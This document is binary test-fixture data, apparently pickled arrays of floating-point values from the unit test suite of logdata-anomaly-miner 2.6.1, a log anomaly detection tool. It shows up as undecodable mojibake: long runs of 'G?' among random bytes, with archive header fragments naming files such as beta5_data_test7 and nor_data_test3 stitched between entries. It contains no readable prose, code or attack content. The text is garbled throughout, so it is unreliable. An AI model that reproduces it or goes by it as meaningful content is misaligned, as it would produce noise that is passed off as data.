IG?p%oG?DhP1G?쾱G?O1P*G?Nr>@CG?L[;{G?LG? SG?UXCG?r3G?xAG?Y[HG?#G?-jDžG?eA!G?kaG?oG?G?#G*G?p-G?FG?ϛvDG?G?jc.G?/zG?G?gh[G?`>{G?`{JG? .e#G?XrG?7G?}=iG?XAjG?JG?YG7*:G?٣G?鵗 G?UrJG?흸G?RYDG?[5Ґ`0G?(G?U֛rG?V=KG?^„"G? xG?퇓`[G?ǟJG?/4pG?J| G? G?L-G?뾄.JG?~^G?ǖ>G?K,-]G?꤀ɛ2G?xY.G?ƩG?tzG?fG?ԨG?G?GO<G? f>qG?tmZ `G?YyFEG?5%G? ϼG?VZ'" G?ﴦbG?KSh|G?0I3ҫG?CG?>~m:G?u-G?yVl9G?6xG?kG?P g-G?*G?}oG?Ȱ^G?r]"4G?ȦYG?ʣ2aG?zHG?pqG?/}G?t1OG?T/`G?;ئG?ֽW'YG?gEG?]e@2G?d}QG?:XG?G6<G?zз6G?'OtG?陽);G?݄ՔG?Q G(>G?; G?yG?zRG? J^G?竓MAG?ĕ G?2G?hG?}ޕxG?A-}G?p+PUG?37kG?Sc?G?^x_[G?3FG?dmG?CRG?ieIG?]DG?N}G?aӗ`G?w-G?d]G?EdvG?qyGG?e*bG?ʝdG?FG?t)bG?0>cG?!G?HqG?&O+׀G? G? 4G?4r>G?Tg]WG?怪AG?gmSG?ʲ:G?qľG?‰ G?do G?F~G?@iG?>95G?E- G?)"G?m*G?eŜG?$uvHG?/jG?p$G?T OwoG?UٍG?u:G?|yD G?!>L G?9Z,G?0o G?=3 HG?.KG?m"G?G?WG?G`SRG?ȫG?,$XJG?1ꤻG?G?-eG?]G?:ռG?纕$(HG?)r G?ꈭXڍG?[{NΩlG?G?PZG? oo#G?IG?ˠHsXG?!,G?k skG?#;RG?뱅)3G?篋3G?إx G?@*G? -&G?KzZAG?.7P@G?556G?&(G?ۜ:G?:K3G?8opkG?CG?-ҼG?|YG?UۧuG?ӬiG? ݁9G?[PCG?g0+G?8QG?唘> G?^ڋG?ᯙG?0GMG?[*lG?aG?cG??G?o`G?χG?5!RG?B40G?L8[ߚG?YmG?=mG?Gm4sG?ݮQUG?ZG?Tm[ŜG?7|G?cO8lG?ZAG?MG?FG?6G?l0G?Om|G?gNG?pP}G?\ U G?eIuNKG?% G?럌B5;G?}G?DNL4G?縫ޓG?eEAG?҈J:G?X=G?egvCG?%*1G?-"HqG?IT]JG?^;G?A)pG?yaG?51G??"=G?ɫG?栨_C~G?3 G?)bG? D-G?Ꙍ?=G? }.G?At G?iV2jG?K&'G?R*UG?hʒG?^T=VG?渠1=vG?UOJ6G? BG?N+5G?e:^G?yG?G?yG?/dG?7NG?՚^G?'G6G?;=Q:G?o٥G?莖;DG?"b1G?1[G? {>G?XRG? FQWAG?ĹoLG?닪 G?,>G? @G?uðG?IaG?9nG?zӿiG?N2ڔG? b\G?ܩ G?[ T-G?W&̝KG?" G?we-bG?LϲG?xlG?JYFG?&&\G?qi/G?݉9F1K~G?F3ZGG?0,{9[G? '^\G?N&5N~$G?C5G?F\G?IG?B[`~G?~@G?^I-G? G?6!q@G?.TG?U]G?zG?$G?σG?1hG??!G?~G~wG?2zQG?!EG?gNG?GuƟG?崩;G?8*6OG?U DG?L~%tG?GP]G?/(cG?p*8G?aǗØG?yK_G?56cUeG?LG?7@ZG?LA$G?, G?عKuLG?8LKG?(ärG?IG?G?һ5G?gG?2>BG?鶨LG?{:2G?NB4e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta5_data_test7000066400000000000000000000647021437606560100275360ustar00rootroot00000000000000i](](G?-_G?GMsBG?Z} G?R1G?NG?uGDG?GϚG?G?H9G?g^(5kG?V;LG?ݣ%G?~zdG?$^LG?(G?z&1ӂG?YGG?MG?Ǩz)G?'uG?PpG?A)lG?JMɩfqG?pCG?锢@;G?C\G?(WNgMG?^K<9G?=G?@ G?FG?{G?BsG?W֢G?ާj4n^G?H)G?Ye=G?Si G?ò8ZG?ɧG?7E6G?)}G?Sx( G?, JfG?hAG? .l>G?MvG?뤅KG?좡G?Z-kG?=5G?DzlG?t^G?QƻG?NE*G?0'# "G?T2G?gZG?R_BG?hG?诲e6 G? G?:ZGG?\%cG?zǓ_G?,i{G?4\ZG?E "SeG?MZTG?jCG?2AQHG?툎YG?&kV1?G?WG?e}G?E0vG?O@"G?7wRIճG?Ct"G?E %]CG?eYx7G? b_~G?7 TG?bvX.G? V8+G?A G?eSG?N,G?d9;G?(G?Z7G?츰NG?8 LVG?[1NG? TG?HQ&G?nG? :4G?_VG?뺈AG?aXG?RBnG?* }&G?f TG?G?WgG?zG?Wr՞G?!G?OԣG?;G?pG?xx)G?`?ve,wG?࣐e:'G?êHkG?1IG? BVG?{[@G?73 G?h|MXG?_ G?݂-G?{Q*G?cv7G?4]uG?^?xpG?f_G?qG?̶hG?ȉ5vpG?ZG?FуVG?՟G?9lsKG?s`"@zG?dЇrG?ޒJX%G?[(3G?)i G?k\G? cG?P{nIG?OSG?t}LG?=GG?Hzv_G??>G?({G?٢fG?06l G?8U-G?G?L%G?hl&G?bHG?4`6G?뒆."G?̶uU{G?W^G?yN~G?FcG?G G?na;GG?:dG?G?G?dLs>G?ՒG?2MݲG?YB G?#ҨG?ǸqG?@G?G?Rg|fG?GG?RegG?t%G?]tG?*tG?wKG?(;G?O!G?KgG?h&uG?tG?]/G?'!aG?Pm`G?EfتzG? G?њSG?0hNoG?. 6G?KG?N3YG?VOG?F+G??(ʹ{G?C2+YG?L G?Q>SG? lQGG?J^ -G? CG?G?ꬬFG? G?(_]<.G?3m@G?dAG?ĶO.G?[!G?V_XxG?9(9G?ȬwG?61BvG?upeG?/8G?,BnWG?qG?ЗG?s,AG?_nu* G?daG?w?G? G?08:}2G?oG?ᾼAG?4KL+G?eꢭG?ݓwtrG? @G?p<G? =9MG?ϏW(G?tHuG?禆ZmG?O/G?sG?۾jG?')G?够@?G?x@seG? ZG?G?G?G?? G?7PlG?\DG?HOrG?3q">G?-\G? * G?CG?8lG?c$JG?7;'G?) G?1TG?!ZLG?Cjw9G?5Jm`|G?E̕G?þpG?;rhG?"G?o_j5G?<3G?kdG?<VG?um4G?VG?=aG?QUzs]G?ZwXG?5+sLoG?5зG?тɏCG?3;'G?TEZ~.uG?%v!G?i\G?UG?uoG?oo4G?;CG?%eG?췦U9dG?ˀ'`G? loUG?;P"7G?z\G?B<G?x/ZG?i>G?Z*;G?9"G?60K%G?G?i$P8G?c:G? =LG?ȁG?]=hG?(i%G?aG?IR G?G?dq;G?) i~zG?0}G?^G?]Sb]G?Jc_G?DkqQG?uSdG?IG?C/G?6#77dG?WHi}G?h'G?U9G?ﻃXG?C_6G?X5G?FhQG?+nG? [[G?E. G?hl!)G?{5G?ݻG?G?9-G? dG?]O`G?CqG??PG?nG?P^G?4\G?ӷG?,~G?:IZG?NZG?TB6G?BΏiG?K7G?٣q1G?P馎)G?$tG?O91|G? :'G?[.G?y9LMkG?nAG?idG?yHd/G?LW-=G?4%SaG?G?OM2G?]G?1\G?%G?p=JG?' ge{G?摁G?-=G?OG?t.G?I;G?q-pG?৔9:G?椩vG?WG?G?_TG?xxG?G?t! G?lG?tMG?p?>vG?wG?F#bG?{(JG?JiG?H\urGG?9G?HGG?( G? }G?mxOnG?:ƻG?  6G?G@=f}G?J<7G?|y+G?CYG?y۷G?SPՒG?MqG? OG?z?ҔG?SfG?G?첦@G?i`+G?yjG? G?#r+G?4cG?enRG?0^i8G?pg>IQG?ttG?4sG?GG? iG?(FBiG?ݷEvG?cG?7 HG?rG?Q\{mG?<;ZG?;DAIG?ܴaG?$;'G?A`dLG?G?QG?%[&G?{bgG?n|ZG?I* G?Ԑ&?G?$ߕޑG?$R}5UG?}G?=hG?Yɤ]G?n:G?Y G? Vvzc}G?v(kg3G?'/OG?xG?喧AsG?x4G?beMF3G?h$G?QG?ze@G?@ɇ\=G?8BG?c^9G?bvG?YψG?qG?,@zG?flEcG?#)N0[G?CGNG?pzG?wgG?00~CG?pGVG?@>tG?> :jG?墁) NG?UG?'EG?2G?悔jG?G??$AG? IC G?m?G?FqG?ݟ*G?lqG?:RG?{YWG?I~G?o Uz G?CG?G?FJkG?VݪG?NG?I1eG?QuzG?`RG?EG?*G?UaG?JS|>G?Hz]6G? G?(G?oi`{G?GyG?iG?ϨUFG?!JI}lG?P~G?lS)pG?m G?'_cG?S3GHG?FA[G?X'G?vdG?G?cNG?Hw͊HG?"KW"G?dG?=mtlG?O\CqG?<~voG?*ۛG?!KG?6,G?OΔG?QG?zC*G?{(G?.k/G?A}G?AaG? x7WG?wG?g0nG?uCTG?_G?K43G?w~cG?؋NG? G?V'6G?x*yG?ꞏG? lG?6c*G?f˒G?'ƘG?g|G? G?禤mG?@rlG?дG?EG?)AG?7QTG?$vG?sG? #Ҽ[G?h)McG?줲B4G?\F^G?DG?4G?e1 -G?kUG?hG?5G?|,G?nɑ G?Ѹ{>G?aG?wlG?Ff1G?㚫rG?(G?V•q G?!A{L!G?G? 5 G?ReG?BnG?hMG?ԥiC:G?ᄆ~YG?ʀG?텽6G?%gmG?`'G?IlfmG?Hi՗G? G?)G?P}:G?= lG? vEc'G?CIG? u|G?P m~wG?DžG?쓗UG?P:@G?>3zvG?։DG?_X G?TmpG?JI,G?JuG?drs/G?G?V]G?~BUiG?kw;G?hRR)G?sрG?VNG?켛CUGG?LxjG?זּu/G?絙d"/G?FlG?:.G? ZJdG?A:@G?KrG?ޏ;G?!ǷLG?+foG?tYcG?|Z.G?x%GG?U?=G?nQG?di G? G?cG?juG?1G?}G?CXG?裱G? nG?T/G?:æG?*e&G?LdG?惪k G?> |G?"nqG??2=G?` G?"G?xvG?K.G? G?z | G?G?TNG?,@MG?n>,G?BoG?_ځG? y[G?=zgJG?G?hyWG?,{h8G?]B"G? nG?=pG?!xW7G?fhG?sfeG?Jˋ~G?‚G?цG?6iG?vMG?ܬu-G?jUG?^03ƅG?kE]&G?HaG?fEoG? [`G?Fl1CG?Q3oZG?﫦BG?RqRKG?NjP>BoG?H.KG?.~oG?kR`G?Y̝G?JFHG?>=AG?}jG?;\AG?՟]G?/KH,G?YWG?EG8G?^VwG?G?*羽G?<tG?3>ohG?C1G? 9t6G?}0Y[G?]t/G?׺aG?iG?RncG?[uG?Z WG?-_$G?ʄG?oG?oU PG?IJG?PFXVG?SG?͔r)G?@G?~;G?%,4}G?;^OG?pG?'VG?N d?G?GW\C2G?\(G?5=.G?Ds=dG?G?ז:G?w{G?t}G?p xG?S rG?'h>EG?=G /G?E QUG?qBqG?Y MG?k@OG?pF"G?-*G?kBnuG?ㄐ@.G?dZPG?(^NG? M :G?] 8dG?Ǥ1d:G?;\vG?+G?DApG?+G?돦knG?]^|ȪG?~Y]G?U,GQG?.EG?\soG?G?B$zG?izG?CG?甎oFx0G? 2kG?Hx*بG?N}G?놁wG?gʆG?6p\JG?nG?aNxJG?B%[G?K5G?`_hG?2sG?j2G?Lc5G?&yG?񰰵TKG?*⯸G?-.;G?,ňG?mOYG?+UG?=,G?F{ZG?r$+G?l({G?V:G?D0}G?Pk\G?dmODG?)-<(G?xIGG?@h G?UQsG?Y|٪G?咤{[G?QG?Ռ dG?랱G?v>G?/M c3G?SG?rDu6G?[X~G?WDG?5d|gG?4$!G?6r7n+G? !G?ꙧTSG?9밃G?vv"VG?y E.G?G?sNFG?:GOG?ﶳ%vG?PǨĘG?=ZG?GFG?꧖BYG?Rm[G?}G?\cXsG?)S,+G?n\G?A G?-C`G?&]KHG?9 (G?KPzwG?;,fG?F-6G?s ,&yG?G9EG?O3 G?痗FG?^G?~FiG?>eG?v=?G? W.G?G?8 FpyG?a)czG?< cG?ϞHG?f G?#; ?G?2 kCG?ኹG?ǬG?蛱(G?MlG?GerG?Rr XnzG?,tgY5G?RʂS`G?kPG?sUTG?EHG?p.N0G?)gG?{cAG?F-҉!G?7$.[G?I5G?]VG?KnhG? KAG?a0VhG?;mG?약@6&G?0@G?M`VCG?8mG?,t6K/G?O@?RG?(׵G?YSI3wG? D_G?gJoSSG?$A'G?唓G?'G?رG?M[G?ퟦȎG?.4]G?bxtG?g? -G?^fG?G?CG?[푍G?n;G?n"G?#Hm~G?U]OG?0G?u7YG?6*_G?إfzG?x=G?Qo8)7G?Q\\gG?eG?{G?ޅOfG?y3VG?g9XSG?CG?l^\G?"aBlG?giaG?3wtXG?Hu+PG?B`G?|(G?)4k/G?WG?mlG?^G?8EG?䲧0 G? 6;PG?^d4G?R:G?,\G?idSG?9 (G?/ҰG?ڴ۳uG?͵bG?bG?{d""G?eX(G?UG?ο G?q1G?w]EG? IxG?D>S|G?귔+كG?srG?jG?ZG?\a)G?ꒆWG?hIG?1tG?U0G?MzT`.G?@+G?hG?Y?TG?CG?P`SG?X"ckG?n1[G?z~G?" G?An'G?SxG?qa ^G?L^}G?epG?8/RG?{Z]G?}.7zG?kꐔqG?엠pdaVG?v PG?YYG?QcqG?om?-G?ˎ60*G?}V%G?iC G?yàG?P=G?؊G? 0UG?KIG?49 xG?Nl>G?qgG?!OG?t!TG?þG?gA,G?!G?@G?v|EG?b{]tG?:rIG?䌾dG?ۇ92G?HG?dSKG?Y'G?h6G?-f_G?ZG?wO>G?JlWSHG?4G?cO&WG?!xG?7uG?QqIG?雪|G?vSG?:rG?mbvHiEG?nUG?2G?gG?'+BG?mG?Au6G?鸽FG?qhG?ܙemPuG?BDG?v#d7G?G?us?G?/7ReG?︫0G?&$fG?2R{~G?oԹ)G?@dG?9jG?)xiG?2G?EG?G?:nG?/G?ՎkG? nFG?/AG?!NG?EӏG?a\8G?eHG?<9 FG?[#,G? BVG?cogG?7nXWG? G?ZwG?$:G?]5y G?:|ۗG?Ȫ*7jG?'G?HG?*ѡG? (mCG?ApG?7YG?qۻ{5G?m&G?^yG?噃G?G?kJG?;CVG?pD8mG?bƝ{G? FG?Fu)G?QG?ֆ,;G?O\pG?\heG?p6c8G?b$G?1-G?(&KG?dG?RG?+}G?Bά;G?XUG? TUG?M?l;G?\8(;G?5nG?V_G?GG?B}G?pLf~ԤG?i.#G?Kf(G?#'7}G?-$YG? A7G?d9p"G?!G?"G?-v@G?˂ G?G?GVzG?sG? 1 + G?b]G?"6נG?:DG?ڔ`oLG?>G?]%eASG?옭CnXG?4hCs&G?C:KVG?吮rG?AmoG?CC.qG?u>G?aUG?{eG? 7)-=mG?C/|G?mG?GVIG?[5G?XP G?ʠLG?1ޜxG?tKG?xG?4xG?a*[G?汬;FhG?TWyNG?ҞiG?b8G?\CwG?v(G?yG?V;HG?ӬCGG?PG?jgNjG?MyG?ho"#G?TbG? ;G?裉G?[-G?ja9G?Xy{CG?F~G?{- ۍG?:eG?aJgEG?\G?k[G?)(yG? XrG?OPG?lDDG?Hۦ:G?{u!G?rԶG?ckIG?ޢځoG?,Gvs9G?UG?~]}RG?[*4G?^EG?퀡"tG? ('G?E?G?24pG?U(3;! G?sxKAG? 6MPG?G?_J3G?VIG?ٟr&G?G?BG?`ΨG?DXP+G?NB_ZG?EIG?) G?gۉ>PG?$_gG?^ G?X0YG?.@+G?LgձG?G÷G?ttG?ߞlfƷG?ݔ" RG?%4G?2jG?j03QG?.t^.G?-ArG?`G?)DG?햘AG?-ѕ` G?퉂w8tG?d >WfG?2mxG? G?@ kG?]G?n[kG?gmhG?.yG?X$G?H~G?P=lG?ID!G?CsxG?Axq*G?{pG?KpG?,G?wHcG?LG?v`6G?jIyG?:G?|G?Hkw1G?bwG? )aG?篼W'ѳG?m^G?$IUIG?U|G?0~mG?o~ G?l-jGG?8K1WG? oG?=FG?8G?G?s1G?/(`]G?QKSG?_w+G?{VٓG?T6T?G?f$ʌG?pNfGG? YG?6L 1G? 1`G? Q)G?wDZ0G?襪G?DT@:G?⤉fG?Z&G?W/T4G?ሟXG?ν!G?캩oG?_߷G?+쌫G?QsSbG?O͏G??^G?s1G?G?ESG?0G?fٖǃG?? byG?@s&bG?&/3G?5G?`lbG?a@G?s>G?- ;G?G?J/eG?XLjpG?h% 4G? ͘=hG?}tG?:;GG?(LG?u wYG?[G?_RtG?dB G?rM7G?9#VG?&\G?l/G?F, G?荙)G?0]YG??7 G?c^E G?ipG?FG?uj=A/G?wBG?v>uG?QNG?~JG?{=RPG?볹PG? L@G?(atG?y/wG?֐$G?Ǣ5G?SfG?B{+G?nl(G?5tG?[6G?:RoG?G?RO'G?ݚ'!G?cWG?֒ G?WmyG?'-nG?=u۸G?yRGG?eeZG?`w9G?xG?@!G?CG?Z\lG?fayG?Y*!nG?襼VG?֊G? =:SG?謦PG?)XzG?qUG?buG?nBG?*ާG?Dnl1G?CLR0G?%n}*G?Y4KG?JZ=G?sKG?z?G?b?G?8G?jY/G?sGG?1G?@hG?A&G?'EΘG?6{G?$rjsG?+G?%8G?2bOG?wUG?C}7G?䭤#G?aQEyG?#(owG?'}G?8?G?3YG?GG?-G?Z4G`vG?w\!G?SG?r^xG?|UG?ԛAG?rIG?ˣaG?oӗG?3 G?Yq+vIG?X/ jG?5YPG?^彝QG?XzzG?/ ƲG?.|U-G?݈kG?:G?$[ĩG? a/G?LJBG?~¦!G?^sMSG?F,EG?ԵN:G?ʕT#G?q^ԚG?PG?pU?G??TnCZG?0G?G?P YG?hG?jfuG?(G?.ⷹG?zD6G?[?نG?z}G?ہG?[ZG?h(G?G\G?wgG?2G?p ̧%G?puD(G? [ G?-QG?u5G?7(\8G?# \dyHG?`yAG?K+#;G?抠|'G?CIMPG?늊쎿G?;3{G?IIG?彙OH G?*_AsG?C-7D=G?H&G?"W:G?<2yG? 0ցG?Gh[ G?šG?ЀG?[xG?* VwlG?l/PG?.[G?eYG?휃xG?ʳL.G?JS `G?_aG?p?G?m0FG?knM G?ȻmdG?릇,G?+G?`G?{#vG?sqUdqG?4[EG?ݛZEzG?ri]G?쓫NVQG?LQ2G?ڌ G?<*G?UUG?'/G?K<(G?+яG? e](G?T7G?dW _YG?!X/G?.G?dݷG?3I#G?kZ"O 'G?ᆬWG?^gG?(1G?O+G?橷yG?qh(G?-W3>EG?7< nG?}]G?91'G?;j'G?u0ZG?IʄK$G?)dG?ediG?ItnG?ߔlZG?0](xG? pG?, A1,G?zFG?h'? G?ARsG?_G?ІB G?|G? -JG?쾧:G?"52G?VAG?ydG?ٜa.aG?قX}G?.G?P#G?{JH^G?AG? G?ZTG?얿=G?LpG?aLG?&_$tG?O0?:G?F[G?&cG?UG?t1HG?YG?G?pr\G?hr]oG?Sv;G?߫r#G?\lG?F}G?K2\G? G?J5G?,E7G? :sG?0,<#G?S-yG?3;G?X!? DG?G?K$R|G?_G??⛿'G?EG?쾖g6G?'@G?IC G?âG?9]G?tc0LG?OM& G?@ ݶG?G?WyƛG?^G?3BG?ж+9EG?XfG? uG?Zu7G?"#G?RAG?nyG?m3G?;hV2CG?d} G?qG?A4Q"G?셐IG?H~]G?c[qEG?:IfG?{]G?o]G?smG?eHJCQG?r\G?t>]G?:]:G? ?)G?OP G?C G? G?;">G?gG?,w3BG?_3G?:i6G?U!ϕG?v8JG?߮dG?"Z*G?yv3G?.F=EG?]LG?oG?'CڀG?bQG?xdG?)YG?g;.G?6O G?At@G?YWG?ڻ!G?s1G{G?ghG?K\G?1 $7G?*]lG?Q;G?Þ^G?ɟG?lG?fZa?CG?ǵG?2@G?0_j,G?6efG?ZDaG?.dG?c>,G?=G? ]VHG?N 'ORG?,G?8GG?CRG?kɄcG?A~wG?˱;G?/1G?UyG?%G?BLTG?Aa[G?oM'G?}tG?ړ3G?ﻒ?Q#G?c$G?Hܶ栄G?M!G?IhG?$v(G?j0G?YjG?}h(G?{->"G?qN{0G?;|v>G?'G?pj`#G?9! G?+#G?Ζ[G?!G?_ewG?Ө.G?`G?|sG?4>fG?0؎OG?;GwnG?"bYuG?d\G?:"sHeG?줸:{rG?, G?:#G?G?HG?`.G?G?8 G?6FpG?#G?*t!gG?<}UG? i`G?刢G?;g%G?&WG?u#fG? G?c2G?[)G?rcG?첃\yG?yG?,"G?! G?΂G?@AG?TRG?:EG?ã;%Z`G?|{^G?zAȽG?guG? l1G?rtn&G?]JG?7}G?YG?esS,G?cmG?tLG?W*G?JL[G?n!tG??8G?/G?gN!?G?bvIG?89ճG?ؽG?_pH!G?k G?Me'&G?G?ѽG?O}0G?Prbk[G?,'G?2ӔG?ܘN !G?0G?QVG?[ƪ G?qb1G?aG?te~G?<F%(G?+VG?BatG?%ZհG?GSAG?UVb:yG?ȓG?KD~G?1G?"*m dG?8 G?]SG?x97z=G?*]G?9:G?홨¥G? i#bOG?g%rG?2dG?WmI gG?훗6kG?(ťG?)n-jLG?XiڵG?4dG?vEG? Hj;"G?X͍H!G?欲hG?+DHG?_=]G?)/>!G?S&G?+ G?4/G?+o#G?ڲG? *>XJG?<G?*&oG?BcG?YG?֍%RG?H@)̚YG?x G?yb8RG?T/IG?bVG?$%OG?/TG? 'G?iG?B HfG?~G?((FSG?^+G?B8G? }G?Jj-G?:^^G?ݾ+G?=wcG?7 ~$):G?XZ)G?Ҁo0ʴG?ͬ$|G?聯G?﬎(eG?JC|G?n1?G?lG?L;aG?gKG?酸8G?=yG?i|&G?QuG?qdtG?Y,sG?轲GM'G?q4\G?߄G?{boG?l߳G?쪲.tG?]@G?/J՞G?ꡪ4G?ߵ613G?QG?TIŨG?_cNG?~G?LtHG?,F!%>G?ήTRRG?'۠G?̿G_ G?e艩G?JcXG? ]klG?[ͧtG?$ǜG?)ٜv-G?땔G?'[G?5 zwG?/M5PKG?(?vG?ǩaG?#r3G?ٳ"G?@_a G?s2MG?ܵe`/G?E%OǻG?拕5cG?أ G?QJiG?%~[G?h뒩G?釄G?B\f'G?k iHRG?xtsG?,|G?cG?}eG?{G?^BG?TG?}ROgG?80aG?[uMG?W/G?~'G?1c#4EG?)G?G?韘G?MRBG?ϣG?!bpG?َ.8G?kx~G?|=G?鼺qUG?gu9 _G?Do}G?-ȱG?G?2n'G?PސoDG?tCG?ĪKG?'RG?j={G?Vzn+G?xHG?A֌G?.S0G?1DG?#gG?J,G?{4qG?II>wG?KpyKG?m {@G?NfRG?vG?fSG?MMsNdG?ҮgZG?ێ8G?{LA}G?ernG?fycG?mX !G?xAG?'G?ZםxG?d1G?bWJG?$G?܊SπG?$UYG?馪KG?{SbhG? gpG?֯TG?:"G?jrXG?aeG?@G?"s`G?_ 'G?Ε 1G?ud$bG?찷 ,{G?鲩,G?|YG?%G?WLG?7S\G?HxG?6SdXG?AfAG?8]] G?E1QG?O{mG?G?DG?3G?Oq BG?/uG?ILG?x$=G?+-2G?ǫ`G?F1G?$ym- G?wG? toG?NG?o|pmG?FP+iG?WCG?ԅ[G?fG? 'G?DG?͖vNCG?UG?ظ[(qG?$4TG?2'SG?G?hȦG?jk'G?5nmG?xO%G?`izG?n` G?DG?dfG?,+GG?g["G?8xpG?G?悱9TG?ir DG?`GMG?rmG?/aG?KbG?)*jf G?`/1kG?7qG?G?ﴮv|&G?EG?l)G?bG?kOG?j0~G?xG?%cHWG?G? aG?sw0y|G?Nr}kG?zz"㧧G?f3G?\HsG?IG?ZG?UG?@:/kG?VϠIG?銦:xG?YS-G? G?NL컴G?ިG?I6j([G?HQG?D(G?/2G?Ԑ:}G?pG?HKG?[G? G?<_iG? h8:G?-G?tL 1G?vG?Ms%G?6G?* G?O3JG?}G?,;G?ڛ G?F4G?ƁLG?O"!^2G?u9zG?B/G?7G?:zGG?8|G??WwG?kҿLG?`f#G?,@!4G?J G?H G?A$G?m G?i&=G?zG?LQpG?XਜG?c7G?V9 G?3`G?*(ѮG?a:G?n f >G??G?5fSG?cfzG?>pG?^@G?%G?2G? fG?]kG?0{tG?@VG?&qG?&'hG?\ 'G?i=G?8DG?|1{G?P\jG? :#1G?|6φG?yc6eG? ))9e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test3000066400000000000000000000432761437606560100273330ustar00rootroot00000000000000F](](G?©bXG? $GG hOsGGwm0G ;GE%8G(AGp}G@5cG?)Gι$G?2O\zG?75Q6GQy r9NG&l&G?MIGmG G? YG?="G?MSOMG?_"/G?4fpG?ζbGעfǻG@g"6G?tN|LG G΄eG?U¤G@~'G?cz`CqG헎yG_~rG?n4yG?lyXG?/ IG?1jG?K^ G? @[M?G&GD"^G?4 iG?AUSGii+G?IG?34G?.daG?)@G?͝?G?ܫWe6G4*OGqG{AlG?>39bDhG~tK(G? "G?jM)G? G +!pG?VZGd[OGGf^VGWkAGѵglv8G?>_yG?=߲G?~GpwkeG?aGp6,G*/G?S[ٚG7۵G?p/ G?륔I ]G?w$HG?ZrAG?q˥sRG" ]GG?]GRPGs>GLGśGPG`PҾGV`G?J\8G?Ay`ފG?{rfeG?<>}G?ȫ5G$FG?HÇi(Gh*PG۔oGSIZG?qwGk (pGW G?|,XYGxGC1G?(BeG%Nt*G?9 5AGvVZ5G=G?6s^bGx5G?0"ghG=C9G?%bG)pEG5EG[tyG?SfrGd%oGPوGƃނG?ZG?ca8uG4Q[G@,G䯟\GGG?->Gk GrΥGFG?$9>G\:3j#G2(CRG7+FhG?JWgG?FGwGm`GYlwG?{UG?+G?ڔG'G?Ge:dG?GKG?vvmGrG?, G22G2SG*~~G?=Ӌ G?[ 9AG?G?iXG| %GkW*;GM g7G?3J2G?Tj@G?C?BG?\I+Gw1ҙG{)}TG0<Gә.;MGjGJG=lG  G?ΉVwx[GzG) G?ʇPV\G?BG#}$o&G?[Gd!EGjFeG?@/G*ԁG݃h&GծG?1s G? dWG^>@fG97yG?˦+'GwG? CHՄG߇*G?,B}G?S G=fG͉Gxj*)GkG?(KmnG?չY`AGX}G3/Glp>(pG?!MnUG?r_GriGt.3GPWT4G\MMjIG@rsG?}GP'G~G?*pG s]G?a?G?u`Gf1CG?ݓ+tjKG[k0G䨂iG[nujG?]ɊG`!fG?:"G?۞G?XG?xnGZ:G?[_vGG?Քit%GӾYGኛTG;Gܿ~0G?t.G?b(G?G?j .QG禗ֲcbG?A.0yG㪂G1 p0AG?b|ljF G?x;G@Sت)YG?zGnD Gn; "G?&rWGܕAG?;yސGL'ljG?:;G?dM@G jmTBSG[9v.G?#ReMG?_|FaG$%?R@G?ňf Gꤌ6 UG?<+G?Keۛ3GzG9IG=G?|p G?HMy;GNyG?1˶G?繈GMG"QA|-GnzG&mG?h6mGr;~LG?2C\QW2G?0 (GG?! G?抎"*G?abWG?ٌGG\>vG?h?pG?`G?ޣtG?N<G? e G G?reN4G֜*mJ-G;Go=G?@jG?hhOG?iPiG?CTG<'G CNG4G)3Hm3G?`GCG@ ~G?[ŇG?G2W*,G?)G?&3G?g,cG+`G%s'G?EXG7 0Gā˅G??fNG?weGbX^ $G?;+`G?BEG?M7GڳG?<+G͢65hG?B6Gۗ"(aG?5~G?yOGP؎ GfCGPȂGR/p G?#G?[+.fG{jlG?rXG?~;h".G?)B Gҗ GHHNG?PyG?.3G?frG?݊ gG?nlinG?ibG?Ջ0|AlGG)bG?yC G?1G?":5ЧG?R}}GKv|G8-GLǡG?yO6LG?WJG7H.G?DnlG?unSEuG?yqG? 9/wNG\rJ+G? XRG?K &1G k,G?DJ`=G?ȹ(G?E$ GD@%*G?P+r$G~G?V=*G?BWG3G?SrXyGo pG?>UB'GG?Y vGR eG?-bG?L)3jGD!kG爵۷G?XInwGۺ܏G?(/G?ja|G]G&_VG?R`(,G?$}ȝ]G?)G^#:]G?G)Q掞G8+:Grh|aGHwKGc%G?OjG?ɋ"|GwGmbmG? G? r/G?B_G&/G$يtGLFHG%rvGOG? h"G?L`G?惽:^UGS G[2brG? `GM!#G'@NE4G?ޢ61WGd+Gũ75Gᒐ <@G*G?0嗴Gv-g G瞫 GB$G?]Y6*sG7KG?5h.G?א;}SOGyFG?\+G?%hӂG _G?JyG?JdG?<CGG?<>vG,vVm`G>+G?Dtm}>G?ع\ˈG?#c$G?MժLG?c| GlY=FG痯iQG?-G`Gs3G?c`o5>G?Eo{PG?+GOG~YiI_GxBmsG?SBNrG?ڷfxEGZ*zGE|TGǻi?@G6[iGcq+G?(G?GG?Ր`|SGՉ@%&qGk329G?v|3G?G?vn 'G?{HG?ع]tGGG.G(mGOZG?CxKG[f!Gx0G?Olj%G?߫9:G?޷]7G?1|#G ;!9G?)TG(?!GzֿEG?ikDG? G?30G?,ꭉGnPGP"^GFFr9G?~8G;G3xgG?uu&QG?e^ G恀Glg\GKRG?_qG-.gGkWyG?jCG?bTIGρXqG=8t8G O5G~I20G?`G}AG% G?DŽG?LE^G?-hcG?>ҸG^>GT)ψG<6G@R$GfG?J!G'=÷BGݻ4AGsyG?6вGw83GN)G?yG 8îG?{DG@/G?K@DGlDnG좳ՊG?xD kgG޲=aG dG@'#GŚ,cG_bd#GS G;9kyG?#!j-G{3G?&>@GΊdG?qiqG?MGY@&G@5jG[=G?*s&)G?>)G!&DpnG\G? 8ywGG❆ =G?>/GT+GpcGz߈;G?njG?:/G?|vG?Z@G?xG?찧G|QyGGiG~UrKGuG?3FhG¥VuGfG#*GTmG@5|G%1h|GA[DGt~m1uGq~RG?4]ʼ9GɀXNE G?㜟NG?m7/.G9\PGR Ga8{IG?OGJG?ڰT\@G8qG}RX;G64VG? -fG{n.GBG?ԕ`G?ڊ^ [G?08GG?38G1 a;G? VŽG-<){G?BGG;G?D&wG^p =GܫfG?_PƠGT[G?QȖYGg^G?|P֊G?G?z?6]G?aHGGؤ G{GQkG?DJ!G~GL )G\+G@ sG? qG3YGmAgG?+9G)%G?"_6G2NG? PG7"DjG?NH!GvG?$f_pG.GYe(G?0- G%G? 